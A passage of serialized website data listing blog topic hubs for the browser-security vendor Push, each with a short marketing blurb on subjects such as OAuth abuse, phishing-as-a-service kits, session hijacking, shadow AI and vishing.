evolve.",60,{"sys":2037,"faqItemsCollection":2039,"name":2041,"slug":2042,"tier":45,"intro":2043,"faqTitle":33,"postCount":2044,"hasPage":60},{"id":2038},"topic-non-email-phishing",{"items":2040},[],"Non-email phishing","non-email-phishing","Non-email phishing delivers malicious links through channels your secure email gateway never sees — social media messages, IM apps like Slack and Teams, search ads, and SMS. Push has intercepted live campaigns arriving via LinkedIn DMs, malvertising, and messaging platforms, which is why it detects phishing pages in the browser at the point of click, regardless of delivery channel.",53,{"sys":2046,"faqItemsCollection":2048,"name":2050,"slug":2051,"tier":45,"intro":2052,"faqTitle":33,"postCount":2053,"hasPage":60},{"id":2047},"topic-oauth-abuse",{"items":2049},[],"OAuth abuse","oauth-abuse","OAuth abuse is attackers exploiting app-to-app authorization — consent phishing, malicious OAuth apps, stolen tokens, and device code flows — to gain persistent access to cloud tenants without touching a password or MFA prompt. Push tracks these techniques continuously and discovered ConsentFix, a browser-native attack in the wild that pairs OAuth consent phishing with a ClickFix-style prompt.",70,{"sys":2055,"faqItemsCollection":2057,"name":2059,"slug":2060,"tier":45,"intro":2061,"faqTitle":33,"postCount":1826,"hasPage":60},{"id":2056},"topic-passkeys",{"items":2058},[],"Passkeys","passkeys","Passkeys are phishing-resistant credentials that replace passwords with cryptographic key pairs bound to a user’s device. They defeat conventional credential phishing, but attackers adapt: Push research has documented MFA downgrade, app-specific password phishing, and device code phishing being used in the wild to route around passkey-protected accounts. Deploying passkeys is step one; closing those fallback paths is step two.",{"sys":2063,"faqItemsCollection":2065,"name":2067,"slug":2068,"tier":45,"intro":2069,"faqTitle":33,"postCount":2070,"hasPage":60},{"id":2064},"topic-password-security",{"items":2066},[],"Password security","password-security","Password security is the practice of keeping workforce credentials strong, unique, and out of attackers’ hands — still a frontline defense while most SaaS logins depend on passwords. Expiration policies don’t fix weak or reused passwords; visibility does. Push observes real logins in the browser to flag weak, reused, and breached passwords and guide employees to reset them on any app.",80,{"sys":2072,"faqItemsCollection":2074,"name":2076,"slug":2077,"tier":45,"intro":2078,"faqTitle":33,"postCount":2079,"hasPage":60},{"id":2073},"topic-phaas",{"items":2075},[],"PhaaS","phaas","Phishing-as-a-service (PhaaS) platforms sell ready-made phishing kits, hosted infrastructure, and management panels on subscription, letting low-skill criminals run MFA-bypassing campaigns at scale. Kits like Evilginx, Tycoon2FA, Sneaky2FA, FlowerStorm, and EvilTokens each add their own evasion and session-theft capabilities, and new entrants appear regularly. Push researchers continuously get hands-on with these tools — investigating attacks in the wild, reverse-engineering kit behavior, and turning that research into detections.",41,{"sys":2081,"faqItemsCollection":2083,"name":126,"slug":2085,"tier":29,"intro":2086,"faqTitle":33,"postCount":2087,"hasPage":60},{"id":2082},"topic-phishing",{"items":2084},[],"phishing","Phishing remains the most common way attackers compromise business accounts — and it has moved far beyond suspicious emails. Modern campaigns use AiTM toolkits that bypass MFA, consent phishing against OAuth, device code phishing, and lures delivered through malvertising, LinkedIn, and Slack. Push detects and blocks these attacks in the browser, and its researchers publish teardowns of live campaigns and kits like Evilginx and Sneaky2FA. Read on for how phishing actually works today and what stops it.",94,{"sys":2089,"faqItemsCollection":2091,"name":2093,"slug":2094,"tier":45,"intro":2095,"faqTitle":33,"postCount":2096,"hasPage":60},{"id":2090},"topic-public-breach",{"items":2092},[],"Public breach","public-breach","Public breaches are the disclosed incidents that show how attacks actually unfold once the headlines fade. Push’s breach analyses keep finding identity at the entry point: stolen credentials, OAuth abuse, and missing MFA recur across the incidents analyzed here.",30,{"sys":2098,"faqItemsCollection":2100,"name":2102,"slug":2103,"tier":45,"intro":2104,"faqTitle":33,"postCount":2105,"hasPage":60},{"id":2099},"topic-ransomware",{"items":2101},[],"Ransomware","ransomware","Ransomware attacks increasingly begin with an identity, not an exploit: stolen credentials, MFA bypass, and help desk scams give operators their initial foothold. The analysis here follows that front end of the kill chain — how identity compromise leads to ransomware deployment, and the breaches driving regulators toward tighter MFA requirements.",14,{"sys":2107,"faqItemsCollection":2109,"name":2111,"slug":2112,"tier":29,"intro":2113,"faqTitle":33,"postCount":2114,"hasPage":60},{"id":2108},"topic-saas-security",{"items":2110},[],"SaaS security","saas-security","SaaS security means protecting the sprawl of cloud apps, accounts, and integrations your employees adopt — often without IT ever knowing. Shadow SaaS, risky OAuth grants, ghost logins, and unmanaged third-party access create attack paths traditional controls can’t see, as recent high-profile breaches have demonstrated. Building on the original SaaS attack matrix, Push continues to map SaaS-native attack techniques alongside practical guides for discovering and securing unsanctioned apps, and this hub gathers all of it.",97,{"sys":2116,"faqItemsCollection":2118,"name":2120,"slug":2121,"tier":45,"intro":2122,"faqTitle":33,"postCount":2123,"hasPage":6},{"id":2117},"topic-security-training",{"items":2119},[],"Security training","security-training","Security training aims to teach employees to recognize and avoid attacks — yet modern phishing routinely fools even seasoned security professionals. Push argues that training budgets work harder as real-time, in-browser intervention: guardrails and warnings at the moment of risk, rather than lessons employees must recall under pressure.",4,{"sys":2125,"faqItemsCollection":2127,"name":2129,"slug":2130,"tier":45,"intro":2131,"faqTitle":33,"postCount":2132,"hasPage":60},{"id":2126},"topic-seo-poisoning",{"items":2128},[],"SEO poisoning","seo-poisoning","SEO poisoning manipulates search engine results so malicious pages rank prominently for the software, tools, or services users are actively searching for, turning a routine search into an infection vector. It often pairs with malvertising and ClickFix-style payloads — Push has documented attackers abusing shared pages on legitimate AI chatbot domains to deliver malware from trusted infrastructure.",8,{"sys":2134,"faqItemsCollection":2136,"name":185,"slug":2138,"tier":45,"intro":2139,"faqTitle":33,"postCount":2140,"hasPage":60},{"id":2135},"topic-session-hijacking",{"items":2137},[],"session-hijacking","Session hijacking is the theft of an authenticated session — usually via stolen session cookies or tokens — letting attackers walk past passwords and MFA into a live account. AiTM phishing kits and infostealers have made it a mainstream attack technique across both criminal and targeted intrusions. Push’s browser agent detects session token theft by adding telemetry to the user agent string, creating a high-fidelity signal for security teams.",77,{"sys":2142,"faqItemsCollection":2144,"name":2146,"slug":2147,"tier":45,"intro":2148,"faqTitle":33,"postCount":2149,"hasPage":60},{"id":2143},"topic-shadow-ai",{"items":2145},[],"Shadow AI","shadow-ai","Shadow AI is employees’ unsanctioned use of AI tools at work, putting corporate data into chatbots and assistants that security teams never approved and can’t see. Push’s own browser telemetry shows AI adoption acting as a force multiplier for shadow IT — potentially now outscaling shadow SaaS — and this hub tracks that research, real-world breach examples, and practical controls.",21,{"sys":2151,"faqItemsCollection":2153,"name":2155,"slug":2156,"tier":45,"intro":2157,"faqTitle":33,"postCount":2158,"hasPage":60},{"id":2152},"topic-shadow-saas",{"items":2154},[],"Shadow SaaS","shadow-saas","Shadow SaaS is the cloud applications employees adopt for work without IT approval, each one creating unmanaged accounts, identities, and data outside your security controls. Push covers the problem end to end — from browser-based SaaS discovery to in-browser app banners and MFA enforcement — alongside breach analyses that show where unmanaged accounts lead.",76,{"sys":2160,"faqItemsCollection":2162,"name":2164,"slug":2165,"tier":45,"intro":2166,"faqTitle":33,"postCount":2167,"hasPage":60},{"id":2161},"topic-siem",{"items":2163},[],"SIEM","siem","A SIEM is only as good as the telemetry feeding it, and most log sources never see what happens inside the browser — where phishing, session token theft, and account takeover actually play out. Push streams browser-level detections and identity telemetry into SIEMs, and these posts show how that data improves detection fidelity and cuts alert fatigue.",20,{"sys":2169,"faqItemsCollection":2170,"name":1802,"slug":1803,"tier":45,"intro":2172,"faqTitle":33,"postCount":1915,"hasPage":60},{"id":1801},{"items":2171},[],"Social engineering is the manipulation of people — through phishing pages, help desk impersonation, vishing calls, and poisoned tenant invites — into handing over access that no exploit could take. Coverage here tracks how threat actors run these plays — drawing on Push’s ongoing investigation of live phishing infrastructure and criminal tooling.",{"sys":2174,"faqItemsCollection":2176,"name":2178,"slug":2179,"tier":29,"intro":2180,"faqTitle":33,"postCount":2123,"hasPage":6},{"id":2175},"topic-supply-chain-security",{"items":2177},[],"Supply chain security","supply-chain-security","Supply chain security extends beyond your own perimeter to the vendors, platforms, and browser extensions your organization depends on. A compromised third party can hand attackers legitimate access — as recent campaigns against SaaS providers have shown. Push’s research examines the browser-extension supply chain in particular: why extension risk scores fail to predict compromise, and how developers can harden extensions against takeover. These posts frame supply chain risk through a browser and identity lens.",{"sys":2182,"faqItemsCollection":2184,"name":2186,"slug":2187,"tier":45,"intro":2188,"faqTitle":33,"postCount":2189,"hasPage":60},{"id":2183},"topic-swg",{"items":2185},[],"SWG","swg","A secure web gateway (SWG) filters and inspects web traffic in transit, sitting in the network path between users and the internet. That position shows you the packet but not the session: Push’s research on AitM phishing kits documents how attackers break the signatures proxies rely on, and these posts explain why phishing detection is moving from the network path into the browser itself.",18,{"sys":2191,"faqItemsCollection":2193,"name":2195,"slug":2196,"tier":45,"intro":2197,"faqTitle":33,"postCount":2198,"hasPage":60},{"id":2192},"topic-third-party-risk",{"items":2194},[],"Third-party risk","third-party-risk","Third-party risk is the exposure your organization inherits from vendors, SaaS providers, and integrations that hold your data or access your tenants — a chain now extended one employee sign-up at a time. This hub collects Push’s breach analyses and guides for assessing OAuth integrations, managing browser extensions, and responding when a supplier is compromised.",44,{"sys":2200,"faqItemsCollection":2201,"name":1772,"slug":1773,"tier":29,"intro":2203,"faqTitle":33,"postCount":2204,"hasPage":60},{"id":1771},{"items":2202},[],"The enterprise threat landscape is now defined by identity attacks: criminals log in with phished, stolen, or stuffed credentials rather than breaking infrastructure. Threat actors keep proving how effective help desk scams, MFA bypass, and session theft are against well-defended organizations. Drawing on breach analyses, annual phishing trend reviews, and in-the-wild campaign tracking, Push documents how attacker TTPs are shifting. This hub is where to follow those changes.",52,{"sys":2206,"faqItemsCollection":2208,"name":2210,"slug":2211,"tier":45,"intro":2212,"faqTitle":33,"postCount":1949,"hasPage":60},{"id":2207},"topic-vishing",{"items":2209},[],"Vishing","vishing","Vishing — voice phishing — uses phone calls to impersonate IT support, help desks, or employees, talking targets into password resets, MFA approvals, or opening attacker-controlled pages. Threat actors now routinely pair calls with AiTM phishing to hijack SSO accounts, a chain Push has analyzed across campaigns targeting hundreds of organizations.",{},"blogtopics","96NaQQtT0ris5S9gkZyLC3xAJxPpE2P-qt6DeNgci1c",1791539316837]